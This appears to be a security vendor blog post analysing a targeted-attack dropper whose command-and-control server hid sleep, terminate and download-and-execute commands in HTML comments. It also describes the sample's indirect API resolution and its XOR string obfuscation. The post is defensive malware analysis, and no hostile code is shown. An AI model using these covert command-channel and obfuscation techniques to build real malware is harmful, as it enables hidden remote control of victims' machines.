Skip to main content

Anatomy of a Targeted Attack

July 25, 2012

Stage zero—malware dropper

We constantly deal with targeted attacks, and sometimes we are lucky enough to find the initial command and control mechanisms still live. On one malware response we found a piece of malware that was querying a website that was acting as a Command and Control (CnC) server.  We were able to mirror the entire site and reverse engineer the control mechanisms within the malware.  The following deep dive discusses some of our findings.

The CnC server that was sending out instructions was designed to appear like a simple website.  The HTML on the site rendered as a normal webpage.  However, we discovered that the commands were hidden within the HTML comments of the webpage.  When we visited the landing page on the site, we were greeted with the following under-construction message.

1_6

So if we view the source for this web page we can see the following normal looking HTML:

2_0

The comment at the top, while fairly inconspicuous, is part of how the attacker controls the malware on the infected machine. The directory we downloaded contained numerous MRTG files, logs, and a Microsoft CAB file. The MRTG reports also appear legit and harmless just like the under construction page as you can see in the following figure.

3_0

If we scan the contents of the html files for the string “DOCHTML” we see it contained in several files:

4_0

Within the binary, we find a function responsible for enumerating API addresses from urlmon.dll and wininet.dll. The API’s are called indirectly to avoid having entries in the import table. In addition there is a function responsible for decoding the operations to add another layer of obfuscation the binary. The network related APIs are used to pull an index.html file, that will be parsed for instructions.  The primary instructions are to sleep, terminate, or download and execute a specified file.

5_0

The CnC structure, parses the first line of the html file it downloads and looks for the leading “”  What is in between is the actual command, which is then translated to a 1, 2, or 3 and returned to determine if the binary should download and execute, sleep, or die.  To verify this, we can cab a copy of calc.exe and force the malware to download and execute this on a remote system, as seen below.

6_0

Simple enough for a CnC mechanism, although the CAB file we pulled from the malicious site was a remote access tool instead of calc.exe.  Additionally, while reversing the malware sample we coded a snippet of idapython that emulates the string decoding routine and automatically comments all references to those strings in the IDB.  This way you don’t have to ameliorate each encoded string by hand.  The decode function was fairly simple, the first and last byte of the array are XOR’d together to form a key, that is used to XOR each of the remaining as shown below.

7_0

The malware is simple yet extremely effective, hiding perfectly fine in plain site.

Immunity’s python API for ImmDbg has a “disasmBackward” function that the IDC language appears to lack.  Since that functionality was extremely useful in enumerating parameters to functions, I emulated the function in IdaPython.  This is effective and useful for some situations, but string operations can be expensive so keep that in mind should you choose to reuse the function elsewhere. A link to the script file is below.

Security Tools:

text-plainDecodeAndComment.py.txt

Related Blogs

December 23, 2014

Diversionary Tactics 101

When organizations are hacked or infected with malware, an important question they ask themselves is, “Who is attacking us?” Understanding an attacker...

See Details

November 04, 2014

Improving Reliability of Sandbox Results

Cuckoo Sandbox is an increasingly popular system for automated malware analysis. Beginning in 2010 as a Google Summer of Code project, it has quickly ...

See Details

October 31, 2014

Decoding IBM WebShere Portlet URLs

Portlet based web applications built with the IBM Web Experience Factory, previously known as the WebSphere Portlet Factory, produce long URL's contai...

See Details

How Can We Help?

Let us know what you need, and we will have an Optiv professional contact you shortly.


Privacy Policy

Related Insights

December 14, 2016

Applied Research

We work with you as your adjunct product and service security arm and an extension of your design and development team.

See Details

March 08, 2010

Recent Encryption Research Demystified

Last week, NetworkWorld published an article  under the headline “RSA 1024-bit private key encryption cracked.”  RSA encryption was one of the first w...

See Details

April 09, 2014

The Evolution of Malware and Security Compromise

Malware is evolving and changing at an unprecedented rate. The fact is that 95% of all organizations have been compromised, without their knowledge, i...

See Details

Stay in the Know

For all the latest cybersecurity and Optiv news, subscribe to our blog and connect with us on Social.

Subscribe

Join our Email List

We take your privacy seriously and promise never to share your email with anyone.

Stay Connected

Find cyber security Events in your area.